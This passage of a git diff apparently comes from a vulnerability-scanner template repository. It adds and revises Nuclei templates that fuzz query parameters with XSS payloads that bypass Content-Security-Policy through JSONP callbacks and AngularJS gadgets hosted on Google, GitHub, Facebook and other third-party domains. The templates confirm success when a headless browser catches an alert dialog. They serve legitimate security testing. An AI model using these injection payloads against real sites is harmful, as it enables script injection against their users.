+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://geo.moatads.com/n.js?callback=alert(document.domain)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: geo_moatads_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "geo_moatads_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml b/dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml
new file mode 100644
index 00000000000..8420e4619ae
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: geolocation-onetrust-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via OneTrust Geolocation
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,onetrust
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location/alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: geolocation_onetrust_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "geolocation_onetrust_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml
new file mode 100644
index 00000000000..9635bf17206
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: getdrip-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via GetDrip API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,getdrip
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.getdrip.com/client/forms/show?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: getdrip_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "getdrip_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml
new file mode 100644
index 00000000000..0caea41160b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: gist-github-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via GitHub Gist
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,github
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://gist.github.com/renniepak/e7afcd7e727e1a0c481d955ba10441a9.json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: gist_github_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "gist_github_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml
new file mode 100644
index 00000000000..fe55a22448f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: github-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via GitHub API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,github
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.github.com/gist/anything?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: github_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "github_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml b/dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml
new file mode 100644
index 00000000000..bd6d7f40e97
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: global-apis-naver-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Naver APIs
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,naver
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://global.apis.naver.com/commentBox/cbox/web_neo_list_jsonp.json?_callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: global_apis_naver_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "global_apis_naver_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml b/dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml
new file mode 100644
index 00000000000..616a1a9eb54
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: go-dev-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Go.dev
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,golang
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://go.dev/blog/.json?jsonp=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: go_dev_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "go_dev_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml
new file mode 100644
index 00000000000..ae14d7c3977
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: go-snyk-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Snyk
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,snyk
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://go.snyk.io/index.php/form/getForm?munchkinId=677-THP-415&form=1461&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: go_snyk_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "go_snyk_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml
index 443dc670aa3..10c39f77bac 100644
--- a/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml
@@ -2,10 +2,10 @@ id: google-accounts-csp-xss
 
 info:
   name: Content-Security-Policy Bypass via Google Accounts
-  author: DhiyaneshDK
-  severity: high
+  author: renniepak,DhiyaneshDK
+  severity: medium
   reference:
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L7C21-L7C109
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
   metadata:
     verified: true
   tags: xss,csp-bypass,google
@@ -18,7 +18,7 @@ http:
 
     payloads:
       injection:
-        - '<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>'
+        - '<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>'
 
     fuzzing:
       - part: query
@@ -33,15 +33,23 @@ http:
         part: body
         words:
           - "{{injection}}"
+        internal: true
 
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
 
-      - type: word
-        part: content_security_policy
-        words:
-          - "accounts.google.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
+      - action: waitload
+
+      - action: waitdialog
+        name: google_accounts_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "google_accounts_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml
new file mode 100644
index 00000000000..f4646ed44b6
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: google-ajax-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google AJAX
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.3/angular.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: google_ajax_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "google_ajax_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml
new file mode 100644
index 00000000000..2108c8e9340
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: google-analytics-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Analytics
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google-analytics
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.google-analytics.com/analytics.js?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: google_analytics_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "google_analytics_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml
new file mode 100644
index 00000000000..afeb3eac91c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml
@@ -0,0 +1,56 @@
+id: google-apis-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google APIs
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<iframe id=x src="/%GG"></iframe><script src="https://apis.google.com/complete/search?client=chrome&q=<script>alert(document.domain)</script>&callback=x.contentDocument.write"></script>'
+        - '<script src="https://apis.google.com/complete/search?client=chrome&q=x&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: google_apis_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "google_apis_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml
deleted file mode 100644
index b6fc118d668..00000000000
--- a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml
+++ /dev/null
@@ -1,51 +0,0 @@
-id: google-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via Google
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L186
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L187
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,google
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - '<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert"></script>'
-        - "<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script><img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>"
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{url_encode(injection)}}"
-
-    stop-at-first-match: true
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "google.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml
deleted file mode 100644
index da72ae1874d..00000000000
--- a/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml
+++ /dev/null
@@ -1,51 +0,0 @@
-id: googleapis-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via GoogleAPIS
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L188
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L189C5-L189C19
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,googleapis
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - '<script src="https://www.googleapis.com/blogger/v3/blogs/1/posts/1?callback=alert()"></script>'
-        - '<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)"></script>'
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{injection}}"
-
-    stop-at-first-match: true
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "googleapis.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml b/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml
new file mode 100644
index 00000000000..afc73573aa4
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: graph-facebook-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Facebook Graph API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,facebook
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://graph.facebook.com/?id=1337&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: graph_facebook_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "graph_facebook_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml b/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml
new file mode 100644
index 00000000000..8197cc4c4d5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: grubhub-assets-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Grubhub Assets
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,grubhub
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://assets.grubhub.com/libs/js/angular/1.8.3/angular.min.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: grubhub_assets_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "grubhub_assets_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml
new file mode 100644
index 00000000000..ada648006e0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: gstatic-angular-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Gstatic Angular JS Bundle
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,gstatic
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="//gstatic.com/fsn/angular_js-bundle1.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: gstatic_angular_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "gstatic_angular_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml
deleted file mode 100644
index 28f1e94d860..00000000000
--- a/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: gstatic-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via Gstatic
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L196C17-L196C169
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,gstatic
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - "<script src='https://www.gstatic.com/recaptcha/about/js/main.min.js'></script><img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>"
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{injection}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "www.gstatic.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..063e6aac69c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: gstatic-recaptcha-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Gstatic ReCaptcha
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,gstatic
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://gstatic.com/recaptcha/about/js/main.min.js"></script><img src=x ng-on-error="$event.target.ownerDocument.defaultView.alert(1)">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: gstatic_recaptcha_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "gstatic_recaptcha_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml
new file mode 100644
index 00000000000..0a69a663751
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: gum-criteo-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Criteo Gum
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,criteo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://gum.criteo.com/sync?c=123&r=2&a=1&j=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: gum_criteo_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "gum_criteo_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml b/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml
new file mode 100644
index 00000000000..397bf5aa222
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: hatenaapis-bookmark-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Hatenaapis Bookmark
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,hatenaapis
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://bookmark.hatenaapis.com/count/entry?url=x&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: hatenaapis_bookmark_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
